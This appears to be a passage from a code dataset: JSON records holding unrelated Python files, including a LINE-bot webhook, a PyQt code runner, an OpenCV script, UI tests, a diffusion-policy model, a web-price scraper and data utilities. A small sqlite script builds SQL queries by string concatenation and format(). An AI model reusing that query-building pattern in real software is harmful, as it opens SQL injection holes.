import ObjectDoesNotExist\nfrom django.http import Http404\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom linebot.models import TextSendMessage\n# from line.models import Room\nfrom . import tools, word_wolf\nfrom .tools.line_bot import line_bot_api\nfrom line.models import RoomMember\n\n\nclass WebHookView(APIView):\n\n def get(self, request, *args, **kwargs):\n raise Http404\n\n def post(self, request, *args, **kwargs):\n # リクエスト取得\n request_json = json.loads(request.body.decode('utf-8'))\n\n if request_json != None:\n for event in request_json['events']:\n # ブロック時処理スルー\n if tools.message_type(event) == 'unfollow': return Response(status=200)\n # 接続確認用\n if tools.reply_token(event) == '00000000000000000000000000000000': return Response(status=200)\n\n member = RoomMember.objects.line().filter(line_id=tools.line_id(event))\n\n # status None\n if not member.exists():\n if tools.message_type(event) == 'message':\n if tools.data_text(event).startswith('token_at'):\n word_wolf.JoinRoom(event)\n else:\n word_wolf.StartWordWolf(event)\n\n elif tools.message_type(event) == 'postback':\n if tools.action_type(event).startswith('wordWolf__n-'):\n word_wolf.SetWordWolf(event)\n else:\n tools.SomeError(event)\n\n # status Init\n elif member.latest().status == 'init':\n if tools.message_type(event) == 'message':\n word_wolf.GetName(event)\n\n elif tools.message_type(event) == 'postback':\n tools.SomeError(event)\n\n # status Playing\n elif member.latest().status == 'playing':\n if tools.message_type(event) == 'message':\n pass\n\n elif tools.message_type(event) == 'postback':\n\n if tools.action_type(event) == 'next_step':\n word_wolf.NextStep(event)\n elif tools.action_type(event) == 'stop':\n word_wolf.StopToMenu(event)\n elif tools.action_type(event) == 'vote':\n word_wolf.Vote(event)\n elif tools.action_type(event).startswith('vote-'):\n word_wolf.VoteSelect(event)\n\n\n\n # ステータスコード 200 を返却\n return Response({'result': 'true'}, status=200)","repo_name":"null223/linejinro.api","sub_path":"line/views/webhook.py","file_name":"webhook.py","file_ext":"py","file_size_in_byte":2889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32227951783","text":"from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QListWidgetItem\nfrom PyQt5 import uic\nfrom CodeRunner import CodeExecutor\nfrom Push import PushWindow\nimport sys\nimport os\n\n\nclass TaskIDE(QMainWindow, QWidget):\n def __init__(self):\n super().__init__()\n try:\n try:\n uic.loadUi(\"./Task/QTs/window.ui\", self)\n except:\n uic.loadUi(\".\\\\Task\\\\QTs\\\\window.ui\", self)\n except:\n try:\n uic.loadUi(\"./QTs/window.ui\", self)\n except:\n uic.loadUi(\".\\\\QTs\\\\window.ui\", self)\n self.current_dir = \"\"\n self.populate_file_list()\n self.file_list.itemClicked.connect(self.load_file_content)\n self.run_button.clicked.connect(self.run_code)\n self.remove_button.clicked.connect(self.remove_file)\n self.push_button.clicked.connect(self.push_code)\n self.create_button.clicked.connect(self.create_file)\n self.selected_file = None\n self.active_executors = []\n\n\n def populate_file_list(self):\n self.file_list.clear()\n self.file_list.addItem(\"\\n\")\n try:\n self.current_dir = \"./\"\n filenames = os.listdir(self.current_dir)\n except:\n self.current_dir = \".\\\\\"\n filenames = os.listdir(self.current_dir)\n for filename in filenames:\n if \".\" in str(filename) and \".git\" not in str(filename) and \"output\" not in str(filename) and \"idea\" not in str(filename):\n item = QListWidgetItem(filename)\n self.file_list.addItem(\" \" * (15 - len(item.text())) + item.text())\n self.file_list.addItem(\"\\n\")\n\n def load_file_content(self, item):\n code = self.code_editor.toPlainText().strip()\n if code != \"\" and self.selected_file is not None and \".\" in str(self.selected_file):\n try:\n with open(f\"{self.current_dir}/{self.selected_file}\".replace(\" \", \"\"), 'w') as file:\n file.write(code)\n except:\n with open(f\"{self.current_dir}\\\\{self.selected_file}\".replace(\" \", \"\"), 'w') as file:\n file.write(code)\n selected_file = item.text()\n self.selected_file = selected_file\n try:\n if self.selected_file is not None and \".\" in str(self.selected_file):\n try:\n with open(f\"{self.current_dir}/{selected_file}\".replace(\" \", \"\"), 'r') as file:\n file_code = file.read()\n except:\n with open(f\"{self.current_dir}\\\\{selected_file}\".replace(\" \", \"\"), 'r') as file:\n file_code = file.read()\n code = \"\\n\"\n for line in file_code.split(\"\\n\"):\n code += line + \"\\n\"\n self.code_editor.setPlainText(\"\\n\" + code)\n else:\n self.code_editor.setPlainText(\"\\n\")\n\n except Exception as e:\n print(f\"Ошибка загрузки файла: {e}\")\n\n def run_code(self):\n code = self.code_editor.toPlainText()\n inputs = self.inputs.toPlainText().split(\"\\n\")\n lines = code.split(\"\\n\")\n new_lines = []\n i = 0\n for line in lines:\n if not line.startswith(\"#\"):\n if \"input()\" in line:\n new_lines.append(line.replace(\"input()\", inputs[i]))\n i += 1\n elif line != \"\":\n new_lines.append(line)\n\n code = \"\\n\" + \"\\n\".join(new_lines) + \"\\n\"\n self.code_editor.setPlainText(code)\n code = self.code_editor.toPlainText()\n\n self.result.setPlainText(\"\")\n selected_file = self.selected_file\n\n code_executor = CodeExecutor(code, selected_file, self.current_dir, self.result)\n code_executor.finished.connect(self.handle_result)\n code_executor.error.connect(self.handle_error)\n self.active_executors.append(code_executor)\n code_executor.start()\n\n def handle_result(self, result):\n self.result.setPlainText(\" \" + result)\n\n def handle_error(self, error):\n self.result.setPlainText(error)\n\n def closeEvent(self, event):\n for code_executor in self.active_executors:\n code_executor.quit()\n code_executor.wait()\n event.accept()\n\n\n def push_code(self):\n self.push_window = PushWindow()\n self.push_window.show()\n\n def create_file(self):\n names = self.file_edit.toPlainText().replace(\" \", \"\").split(\"\\n\")\n names = [el for el in names if el]\n self.file_edit.setPlainText(\" \\n \")\n for name in names:\n try:\n open(f\"{name}\", \"w\")\n except:\n open(f\"{name}\", \"w\")\n self.populate_file_list()\n\n def remove_file(self):\n path = self.selected_file.replace(\" \", \"\")\n if \"/\" in path:\n os.remove(path)\n else:\n os.remove(path)\n self.selected_file = None\n self.populate_file_list()\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = TaskIDE()\n ex.show()\n sys.exit(app.exec_())","repo_name":"gladkihaa-28/StreamFlow-Task-IDLE-","sub_path":"Task/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5210,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"70068278811","text":"# -*- coding: utf-8 -*-\n\"\"\"\nBased on article created by: \n@author: Alvaro Sebastian (www.sixthresearcher.com)\n[Link]:(http://www.sixthresearcher.com/counting-blue-and-white-bacteria-colonies-with-python-and-opencv/)\n\"\"\"\nimport cv2, os, imutils\nimport numpy as np\n\n# Crop Image Function:\n\n\n\n# Count Black Lines Function:\ndef count_lines(lower, upper, image_orig):\n # Final output\n image_contours = image_orig.copy()\n # copy of original image\n image_to_process = image_orig.copy()\n image_to_process = cv2.cvtColor(image_to_process, cv2.COLOR_BGR2HSV)\n # initializes counter\n counter = 0\n # find the colors within the specified boundaries\n image_mask = cv2.inRange(image_to_process, lower, upper)\n cnts = cv2.findContours(image_mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n # Here we get the contours:\n cnts = imutils.grab_contours(cnts)\n # loop over the contours individually\n for c in cnts:\n # if the contour is not sufficiently large, ignore it \n if cv2.contourArea(c) < 5:\n continue\n # compute the Convex Hull of the contour [Optional, uncomment to see the change]\n # hull = cv2.convexHull(c)\n\n # prints contours in green color\n cv2.drawContours(image_contours, [c], 0, (0, 0, 255), 1) # [c should be hull, if the previous line is used]\n # For each contour that is not too small increment by one\n counter += 1\n\n return counter, image_contours\n\n\n# load the image\nimage_orig = cv2.imread('workspace/resultado/crop/fingerprint0000.png')\n\n# DETECTING BY COLOR:\n\n#lower = np.array([0, 0, 0])\n#upper = np.array([0, 0, 0])\n\nlower = np.array([-15, -10, -40])\nupper = np.array([15, 10, 40])\n\ncounter, image_contours = count_lines(lower, upper, image_orig)\n\n# Print the number of colonies of each color\n\nprint(\"{} linhas pretas\".format(counter))\n\n# Show the images\n\ncv2.imshow('original', image_orig)\n\ncv2.imshow('contornos', image_contours)\n\n# Waiting for user input\n\ncv2.waitKey(0)\n","repo_name":"jessicahelem/tensorflow-object-detection","sub_path":"Tensorflow_Object_Detection/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2870725554","text":"from decimal import Decimal\n\nimport allure\n\nfrom sources.pages.customer.catalog import StoreCatalogPage\nfrom sources.pages.customer.product import StoreProductPage\n\n\n@allure.feature('Окно корзины')\n@allure.title('Имя добавленного в корзину товара')\n@allure.severity(allure.severity_level.CRITICAL)\ndef test_add_to_cart_product_name(browser):\n page = StoreCatalogPage(browser)\n page.top_menu.click_menu_element('Accessories', 'Home Accessories')\n page.product_list.product_cards[0].click()\n\n page = StoreProductPage(browser)\n product_name = page.title\n page.add_to_cart_button.click()\n\n assert page.cart_modal.added_product_name.casefold() == product_name.casefold()\n\n\n@allure.feature('Окно корзины')\n@allure.title('Количество добавленного в корзину товара')\n@allure.severity(allure.severity_level.CRITICAL)\ndef test_add_to_cart_quantity(browser):\n quantity = 3\n\n page = StoreCatalogPage(browser)\n page.top_menu.click_menu_element('Accessories', 'Stationery')\n page.product_list.product_cards[0].click()\n\n page = StoreProductPage(browser)\n page.set_quantity(quantity)\n page.add_to_cart_button.click()\n\n assert page.cart_modal.added_product_quantity == quantity\n\n\n@allure.feature('Окно корзины')\n@allure.title('Стоимость заказа при добавлении нескольких экземпляров товара')\n@allure.severity(allure.severity_level.CRITICAL)\ndef test_add_to_cart_total_price(browser):\n quantity = 3\n\n page = StoreCatalogPage(browser)\n page.top_menu.click_menu_element('Art')\n page.product_list.product_cards[0].click()\n\n page = StoreProductPage(browser)\n price = page.price\n page.set_quantity(quantity)\n page.add_to_cart_button.click()\n\n expected_price = (\n round(Decimal(price.replace(\"$\", \"\")) * quantity, 2)\n + page.cart_modal.get_shipping_cost_decimal()\n )\n\n assert page.cart_modal.total_price == f'${expected_price}'\n","repo_name":"alex-rybin/otus-qa-automation-final","sub_path":"tests/customer/test_cart_modal.py","file_name":"test_cart_modal.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70651244571","text":"from typing import Dict\nimport copy\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom einops import rearrange, reduce\nfrom diffusers.schedulers.scheduling_ddpm import DDPMScheduler\n\nfrom diffusion_policy.model.common.normalizer import LinearNormalizer\nfrom diffusion_policy.policy.base_image_policy import BaseImagePolicy\nfrom diffusion_policy.model.diffusion.conditional_unet1d import ConditionalUnet1D\nfrom diffusion_policy.model.diffusion.mask_generator import LowdimMaskGenerator\nfrom diffusion_policy.model.common.shape_util import get_output_shape\nfrom diffusion_policy.model.obs_encoder.temporal_aggregator import TemporalAggregator\n\n\nclass DiffusionUnetVideoPolicy(BaseImagePolicy):\n def __init__(self, \n shape_meta: dict,\n noise_scheduler: DDPMScheduler,\n rgb_net: nn.Module, # (B,T,C,H,W) -> (B,Do)\n horizon, \n n_action_steps, \n n_obs_steps,\n num_inference_steps=None,\n lowdim_as_global_cond=True,\n diffusion_step_embed_dim=256,\n down_dims=(256,512,1024),\n kernel_size=5,\n n_groups=8,\n cond_predict_scale=True,\n # parameters for TemporalAggregator\n channel_mults=(1,1),\n n_blocks_per_level=1,\n ta_kernel_size=3,\n ta_n_groups=8,\n # parameters passed to step\n **kwargs):\n super().__init__()\n\n # parse shape_meta\n action_shape = shape_meta['action']['shape']\n assert len(action_shape) == 1\n action_dim = action_shape[0]\n obs_shape_meta = shape_meta['obs']\n\n rgb_nets_map = nn.ModuleDict()\n rgb_feature_dims = list()\n lowdim_keys = list()\n lowdim_input_dims = list()\n\n for key, attr in obs_shape_meta.items():\n shape = tuple(attr['shape'])\n type = attr.get('type', 'lowdim')\n if type == 'rgb':\n # assign network for each rgb input\n if len(rgb_nets_map) == 0:\n net = rgb_net\n else:\n net = copy.deepcopy(rgb_net)\n rgb_nets_map[key] = net\n\n # video input with n_obs_steps timesteps\n shape = (n_obs_steps,) + shape\n # compute output shape\n output_shape = get_output_shape(shape, net)\n assert(len(output_shape) == 1)\n rgb_feature_dims.append(output_shape[0])\n elif type == 'lowdim':\n lowdim_keys.append(key)\n assert(len(shape) == 1)\n lowdim_input_dims.append(shape[0])\n\n # the order decides concatenation order\n # dict preserves insertion order\n # rgb and then lowdim\n self.rgb_nets_map = rgb_nets_map\n self.lowdim_keys = lowdim_keys\n self.lowdim_net = None\n\n # compute dimensions for diffusion\n rgb_feature_dim = sum(rgb_feature_dims)\n lowdim_input_dim = sum(lowdim_input_dims)\n global_cond_dim = rgb_feature_dim\n input_dim = action_dim\n if lowdim_as_global_cond:\n lowdim_net = TemporalAggregator(\n in_channels=lowdim_input_dim,\n channel_mults=channel_mults,\n n_blocks_per_level=n_blocks_per_level,\n kernel_size=ta_kernel_size,\n n_groups=ta_n_groups\n )\n self.lowdim_net = lowdim_net\n lowdim_feature_shape = get_output_shape(\n (n_obs_steps, lowdim_input_dim), lowdim_net)\n assert len(lowdim_feature_shape) == 1\n global_cond_dim += lowdim_feature_shape[0]\n else:\n input_dim += lowdim_input_dim\n\n model = ConditionalUnet1D(\n input_dim=input_dim,\n local_cond_dim=None,\n global_cond_dim=global_cond_dim,\n diffusion_step_embed_dim=diffusion_step_embed_dim,\n down_dims=down_dims,\n kernel_size=kernel_size,\n n_groups=n_groups,\n cond_predict_scale=cond_predict_scale\n )\n\n self.model = model\n self.noise_scheduler = noise_scheduler\n self.mask_generator = LowdimMaskGenerator(\n action_dim=action_dim,\n obs_dim=0 if lowdim_as_global_cond else lowdim_input_dim,\n max_n_obs_steps=n_obs_steps,\n fix_obs_steps=True,\n action_visible=False\n )\n self.normalizer = LinearNormalizer()\n self.horizon = horizon\n self.action_dim = action_dim\n self.lowdim_input_dim = lowdim_input_dim\n self.n_action_steps = n_action_steps\n self.n_obs_steps = n_obs_steps\n self.lowdim_as_global_cond = lowdim_as_global_cond\n self.kwargs = kwargs\n\n if num_inference_steps is None:\n num_inference_steps = noise_scheduler.config.num_train_timesteps\n self.num_inference_steps = num_inference_steps\n \n # ========= inference ============\n def conditional_sample(self, \n condition_data, condition_mask,\n local_cond=None, global_cond=None,\n generator=None,\n # keyword arguments to scheduler.step\n **kwargs\n ):\n model = self.model\n scheduler = self.noise_scheduler\n\n trajectory = torch.randn(\n size=condition_data.shape, \n dtype=condition_data.dtype,\n device=condition_data.device,\n generator=generator)\n \n # set step values\n scheduler.set_timesteps(self.num_inference_steps)\n\n for t in scheduler.timesteps:\n # 1. apply conditioning\n trajectory[condition_mask] = condition_data[condition_mask]\n\n # 2. predict model output\n model_output = model(trajectory, t, \n local_cond=local_cond, global_cond=global_cond)\n\n # 3. compute previous image: x_t -> x_t-1\n trajectory = scheduler.step(\n model_output, t, trajectory, \n generator=generator,\n **kwargs\n ).prev_sample\n \n # finally make sure conditioning is enforced\n trajectory[condition_mask] = condition_data[condition_mask] \n\n return trajectory\n\n\n def predict_action(self, obs_dict: Dict[str, torch.Tensor]) -> Dict[str, torch.Tensor]:\n \"\"\"\n obs_dict: must include \"obs\" key\n result: must include \"action\" key\n \"\"\"\n assert 'past_action' not in obs_dict # not implemented yet\n # normalize input\n nobs = self.normalizer.normalize(obs_dict)\n value = next(iter(nobs.values()))\n B, To = value.shape[:2]\n T = self.horizon\n Da = self.action_dim\n To = self.n_obs_steps\n\n # build input\n device = self.device\n dtype = self.dtype\n\n # run encoder first\n # python 3.6+ dict preserves order\n rgb_features_map = dict()\n for key, net in self.rgb_nets_map.items():\n rgb_features_map[key] = net(nobs[key][:,:self.n_obs_steps])\n rgb_feature = torch.cat(list(rgb_features_map.values()), dim=-1)\n\n lowdim_input = torch.cat([nobs[k] for k in self.lowdim_keys], dim=-1)\n\n # handle different ways of passing lowdim\n global_cond = None\n cond_data = None\n cond_mask = None\n if self.lowdim_as_global_cond:\n lowdim_feature = self.lowdim_net(lowdim_input[:,:To])\n global_cond = torch.cat([rgb_feature, lowdim_feature], dim=-1)\n # empty data for action\n cond_data = torch.zeros(size=(B, T, Da), device=device, dtype=dtype)\n cond_mask = torch.zeros_like(cond_data, dtype=torch.bool)\n else:\n global_cond = rgb_feature\n cond_data = torch.zeros(size=(B, T, Da+self.lowdim_input_dim), device=device, dtype=dtype)\n cond_mask = torch.zeros_like(cond_data, dtype=torch.bool)\n cond_data[:,:To,Da:] = lowdim_input[:,:To]\n cond_mask[:,:To,Da:] = True\n\n # run sampling\n nsample = self.conditional_sample(\n cond_data, \n cond_mask,\n local_cond=None,\n global_cond=global_cond,\n **self.kwargs)\n \n # unnormalize prediction\n naction_pred = nsample[...,:Da]\n action_pred = self.normalizer['action'].unnormalize(naction_pred)\n\n # get action\n start = To\n end = start + self.n_action_steps\n action = action_pred[:,start:end]\n \n result = {\n 'action': action,\n 'action_pred': action_pred\n }\n return result\n\n # ========= training ============\n def set_normalizer(self, normalizer: LinearNormalizer):\n self.normalizer.load_state_dict(normalizer.state_dict())\n\n def compute_loss(self, batch):\n # normalize input\n assert 'valid_mask' not in batch\n nobs = self.normalizer.normalize(batch['obs'])\n nactions = self.normalizer['action'].normalize(batch['action'])\n\n # run encoder first\n # python 3.6+ dict preserves order\n rgb_features_map = dict()\n for key, net in self.rgb_nets_map.items():\n rgb_features_map[key] = net(nobs[key][:,self.n_obs_steps:])\n rgb_feature = torch.cat(list(rgb_features_map.values()), dim=-1)\n\n lowdim_input = torch.cat([nobs[k] for k in self.lowdim_keys], axis=-1)\n \n # handle different ways of passing lowdim\n global_cond = None\n trajectory = None\n cond_data = None\n if self.lowdim_as_global_cond:\n lowdim_feature = self.lowdim_net(lowdim_input[:,:self.n_obs_steps])\n global_cond = torch.cat([rgb_feature, lowdim_feature], dim=-1)\n trajectory = nactions\n cond_data = nactions\n else:\n global_cond = rgb_feature\n trajectory = torch.cat([nactions, lowdim_input], dim=-1)\n cond_data = trajectory\n\n # generate impainting mask\n condition_mask = self.mask_generator(trajectory.shape)\n\n # Sample noise that we'll add to the images\n noise = torch.randn(trajectory.shape, device=trajectory.device)\n bsz = trajectory.shape[0]\n # Sample a random timestep for each image\n timesteps = torch.randint(\n 0, self.noise_scheduler.config.num_train_timesteps, \n (bsz,), device=trajectory.device\n ).long()\n # Add noise to the clean images according to the noise magnitude at each timestep\n # (this is the forward diffusion process)\n noisy_trajectory = self.noise_scheduler.add_noise(\n trajectory, noise, timesteps)\n \n # compute loss mask\n loss_mask = ~condition_mask\n\n # apply conditioning\n noisy_trajectory[condition_mask] = cond_data[condition_mask]\n \n # Predict the noise residual\n pred = self.model(noisy_trajectory, timesteps, \n local_cond=None, global_cond=global_cond)\n\n if self.kwargs.get('predict_epsilon', True):\n # default for most methods\n target = noise\n else:\n # DDPM also has\n target = trajectory\n\n loss = F.mse_loss(pred, target, reduction='none')\n loss = loss * loss_mask.type(loss.dtype)\n loss = reduce(loss, 'b ... -> b (...)', 'mean')\n loss = loss.mean()\n return loss\n","repo_name":"columbia-ai-robotics/diffusion_policy","sub_path":"diffusion_policy/policy/diffusion_unet_video_policy.py","file_name":"diffusion_unet_video_policy.py","file_ext":"py","file_size_in_byte":11475,"program_lang":"python","lang":"en","doc_type":"code","stars":193,"dataset":"github-code","pt":"32"} +{"seq_id":"27481307084","text":"import sqlite3 as sql\r\nconn = sql.connect('market.sqlite')\r\nc = conn.cursor()\r\n\r\n\r\nresult=c.execute(\"\"\"SELECT * FROM products WHERE amount >=120 \"\"\")\r\nfor i in result:\r\n print(i[1])\r\n\r\n\r\ndef amount(num):\r\n answer=c.execute(\"\"\"SELECT * FROM products WHERE unit_price<\"\"\"+str(num))\r\n for i in answer:\r\n print(i[3])\r\n\r\ndef producti_and_currency(producti, currency):\r\n c.execute('''SELECT (unit_price/rate) FROM products join currency \r\n WHERE product_name=\"{}\" and currency_name=\"{}\" '''.format(producti, currency))\r\n return c.fetchone()[0]\r\n\r\n\r\nclass Product:\r\n def __init__(self,id,product_name,amount,unit_price):\r\n self.id=id\r\n self.product_name=product_name\r\n self.amount=amount\r\n self.unit_price=unit_price\r\n\r\nexample=Product(123,\"lenovo 9\",2000,34)\r\nprint(example.product_name)\r\nprint(example.amount)\r\nprint(example.unit_price)\r\nprint(example.id)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"tengopataraia123/PYTHON-BTU","sub_path":"final.py","file_name":"final.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20536883787","text":"# -*- coding: utf-8 -*-\nfrom scrapy.spider import BaseSpider\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy.contrib.loader import ItemLoader\nfrom product_spiders.items import Product, ProductLoaderWithNameStrip as ProductLoader\nfrom scrapy.http import Request, FormRequest\nimport re, time\n\nfrom selenium import webdriver\nfrom product_spiders.phantomjs import PhantomJS\nfrom scrapy.xlib.pydispatch import dispatcher\nfrom scrapy import signals\n\n\nclass KarstadtDeSpider(BaseSpider):\n\n name = \"karstadt_de\"\n start_urls = [\"http://www.karstadt.de/schuhe/1421938458404/?prefn1=brand&prefv1=Ecco\"]\n\n download_delay = 2\n\n\n def __init__(self, *args, **kwargs):\n super(KarstadtDeSpider, self).__init__(*args, **kwargs)\n dispatcher.connect(self.spider_closed, signals.spider_closed)\n\n self._browser = PhantomJS.create_browser()\n\n def spider_closed(self):\n self._browser.close()\n\n\n\n def parse(self, response):\n hxs = HtmlXPathSelector(response)\n total_items = hxs.select('//div[@class=\"results-hits\"]/text()').re('von (\\d+)')\n url = ''\n if total_items:\n url = response.url + '#prefn1=brand&sz='+total_items[-1]+'&prefv1=Ecco'\n else:\n url = response.url\n\n self._browser.get(url)\n hxs = HtmlXPathSelector(text=self._browser.page_source)\n items = hxs.select(\"//ul[@id='search-result-items']/li\")\n\n for item in items:\n\n l = {}\n\n l['name'] = item.select(\".//h3[@class='product-name']/a/text()\").extract()[0]\n l['url'] = item.select(\".//div[@class='product-image']/a/@href\").extract()[0]\n l['brand'] = item.select(\".//h3[@class='product-name']/a/span/text()\").extract()[0]\n l['image_url'] = item.select(\".//div[@class='product-image']//img/@src\").extract()[0]\n l['stock'] = 0\n\n yield Request(url=l['url'], meta={'l': l}, callback=self.parse_item, dont_filter=True)\n \n\n def parse_item(self, response):\n\n hxs = HtmlXPathSelector(response)\n item = response.meta['l']\n\n data = hxs.select(\"//script[contains(text(),'prodid')]/text()\").extract()[0]\n\n item['sku'] = re.findall(re.compile('prodid: \\'(\\d*)\\''), data)[0]\n item['category'] = re.findall(re.compile('pcat: \\'(.*)\\''), data)[0].split(' - ')\n item['identifier'] = item['sku']\n item['price'] = re.findall(re.compile('value: \\'(.*)\\''), data)[0]\n\n if item['price']:\n item['price'] = float(item['price'].replace(',', '.'))\n item['stock'] = 1\n\n\n l = ProductLoader(item=Product(), response=response)\n\n l.add_value('name', item['name'])\n l.add_value('image_url', item['image_url'])\n l.add_value('url', item['url'])\n l.add_value('price', item['price'])\n l.add_value('stock', item['stock'])\n l.add_value('brand', item['brand'])\n l.add_value('identifier', item['identifier'])\n l.add_value('sku', item['sku'])\n l.add_value('category', item['category'])\n\n yield l.load_item()\n","repo_name":"Godsoo/scraping","sub_path":"e-commerce/CompetitorMonitor/product_spiders/spiders/clarks_de/karstadt_de.py","file_name":"karstadt_de.py","file_ext":"py","file_size_in_byte":3210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17032139101","text":"#-*- coding:utf-8 -*-\n#!/usr/bin/env python2.7\n# ------------------------------------------------------------------------------\n# Filename: appendix.py\n# Description: Utility functions\n# ------------------------------------------------------------------------------\nimport os\nimport csv\nimport matplotlib\nimport matplotlib.patches as patches\nimport matplotlib.path as path\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport random as rd\nimport re\nfrom scipy.stats import spearmanr\nfrom sklearn import preprocessing\nfrom sklearn.datasets import make_classification\nfrom sklearn.decomposition import PCA,FactorAnalysis\nfrom sklearn.ensemble import ExtraTreesClassifier,ExtraTreesRegressor\n\n#######################################################\n################ 0 - Define outliers ##################\n#######################################################\n\n# Canada + Quebec outliers (due to non-correspondance with Twitter account)\noutliers = [66371891,24738102] + [292220830] + [82242321,714452684,485296508,75019837,293281723]\n\n#######################################################\n#################### 1 -COLORS ########################\n#######################################################\n\n# Function that transform an RGB int into RGB triplet\ndef int2RGB(RGBint):\n RGBint = int(RGBint)\n Blue = RGBint & 255\n Green = (RGBint >> 8) & 255\n Red = (RGBint >> 16) & 255\n return(Red/255.0,Green/255.0,Blue/255.0)\n\ndef hex2int(hex_str):\n return int(hex_str.strip(\"#\"),16)\n\ndef int2hex(RGBint):\n return '#'+str(format(int(RGBint), '06X'))\n\ndef colors_for_plot(color_list):\n color_list = [int2RGB(x) for x in color_list]\n color_list= np.reshape(np.asarray(color_list),(len(color_list),3))\n return color_list\n\n\n#######################################################\n#################### 2 - FILES ########################\n#######################################################\n\n# Extract files with 2 columns (ids, values):\n# first line has to be a timestamp, not used here\n# second line is the header, not used here\n# extract the following lines in a tuple (id,values)\n\ndef create_data_struct(path,filename,elections):\n depth = 0\n with open(path + filename,'rU') as fn:\n last_elems = {}\n for line in fn:\n regline = re.match('(-*) (\\w+)',line.rstrip('\\n'))\n if regline is None:\n print('Problem in file %s with line %s' % (filename,line))\n exit()\n # Compute new tree ref\n new_depth = len(regline.group(1))\n last_elems[new_depth] = regline.group(2)\n if new_depth < depth:\n for k in range(new_depth+1,depth+1):\n del last_elems[k]\n depth = new_depth\n # Convert to directory\n new_dir = '/'.join([last_elems[i+1] for i in range(len(last_elems))])\n #print(last_elems)\n if not os.path.exists(path + new_dir):\n os.makedirs(path + new_dir)\n if line.rstrip('\\n').endswith('*'):\n [os.makedirs('%s%s/%s' % (path,new_dir,election)) for election in elections]\n\n new_paths = [\n \"../data/ideologies/\",\n \"../data/machine_learning/dictionaries/\",\n \"../data/machine_learning/ideologies/\",\n ]\n\n for j in new_paths:\n tmp = os.listdir(j)\n for i in tmp:\n tmp_path = os.path.join(j, i, \"details\")\n if not os.path.exists(tmp_path):\n print(tmp_path)\n os.makedirs(tmp_path)\n\ndef file_to_tuple(filename):\n cr = csv.reader(open(filename,'rU'))\n header = cr.next()\n id_idx = header.index('key')\n value_idx = header.index('value')\n ids = []\n values = []\n for line in cr:\n ids.append(line[id_idx])\n values.append(line[value_idx])\n\n return (ids,values)\n\ndef file_to_dic(filename,key_str,value_str):\n cr = csv.reader(open(filename,'rU'))\n header = cr.next()\n key_idx = header.index(key_str)\n value_idx = header.index(value_str)\n out_dic = {}\n for line in cr:\n out_dic[line[key_idx]] = line[value_idx]\n return out_dic\n\ndef create_codebook(vpl_codebook):\n cr = csv.reader(open(vpl_codebook,'rU'),delimiter = ',')\n header = cr.next()\n field_local_idx = header.index('field_local')\n field_common_idx = header.index('field_common')\n data_type_idx = header.index('data_type')\n in_dico_idx = header.index('in_dico')\n\n codebook = {}\n for line in cr:\n codebook[line[field_local_idx]] = {\n 'field_common':line[field_common_idx],\n 'data_type' :line[data_type_idx],\n 'in_dico' :line[in_dico_idx],\n }\n return codebook\n\ndef write_interesting(filename,fields,values):\n cw = csv.writer(open(filename,'w'))\n cw.writerow(fields) # Header\n\n\n values = zip(*values)\n for item in values:\n cw.writerow(item)\n\n# Choose an election :\n# input : None\n# output : chosen election by user\n\ndef return_election():\n election_file = '../data/election.csv'\n cr = csv.reader(open(election_file,'rU'),delimiter = ',')\n header = next(cr)\n election_idx = header.index('election')\n elections = []\n i = 1\n for line in cr:\n election = line[election_idx]\n elections.append(line[election_idx])\n i = i + 1\n return elections\n\ndef choose_election():\n print('Choose election (enter number)?')\n election_file = '../data/election.csv'\n cr = csv.reader(open(election_file,'rU'),delimiter = ',')\n header = next(cr)\n election_idx = header.index('election')\n elections = []\n i = 1\n for line in cr:\n election = line[election_idx]\n print(str(i)+' - '+election)\n elections.append(line[election_idx])\n i = i + 1\n elx = int(raw_input(\"> \"))\n election = elections[elx-1]\n return election\n\ndef choose_target():\n print('Choose status : (1) politicians, (2) citizens')\n choice = int(raw_input(\"> \"))\n if choice == 1:\n return 'politicians'\n elif choice == 2:\n return 'users'\n else:\n print('Wrong command')\n print('Entered command :'+str(choice))\n print('Expected command : 1 or 2')\n exit()\n\n\n\n#######################################################\n########### 3- Handling dictionaries ##################\n#######################################################\n\n# Function to add a row of values in dictionary\n# Warning: newkeys and newvalues are returned popped!\ndef add_in_dic(dic,newkeys,newvalues,name):\n # a) Loop over dictionary and add matching values\n flag = 1 # To get the key-features\n key_features = []\n for key in dic:\n if flag:\n if dic[key] is not None:\n key_features = dic[key].keys()\n else:\n key_features = []\n flag = 0\n if key in newkeys:\n idx = newkeys.index(key)\n newvalue = newvalues.pop(idx)\n newkey = newkeys.pop(idx)\n dic[newkey][name] = newvalue\n else:\n dic[key][name] = float('nan')\n # b) Append remaining values that didn't match\n for newkey in newkeys:\n dic[newkey] = dict.fromkeys(key_features,float('nan'))\n dic[newkey][name] = newvalues[newkeys.index(newkey)]\n\n# Function that extract the common values in features\n# with_nans = false ==> keep common non-nan features\n# with_nans = true ==> non-nan for mainfeat_list, incumb and isnan key of others\ndef extract(dic,features_name, with_nans = False, mainfeat_list = None):\n n = len(dic)\n # Extraction of only one element\n if not isinstance(features_name, list):\n matrix = np.zeros((n,1))\n matrix[:,0] = [dic[item][features_name] for item in dic]\n print(np.shape(matrix))\n\n # Extraction of multiple features\n else:\n m = len(features_name)\n matrix = 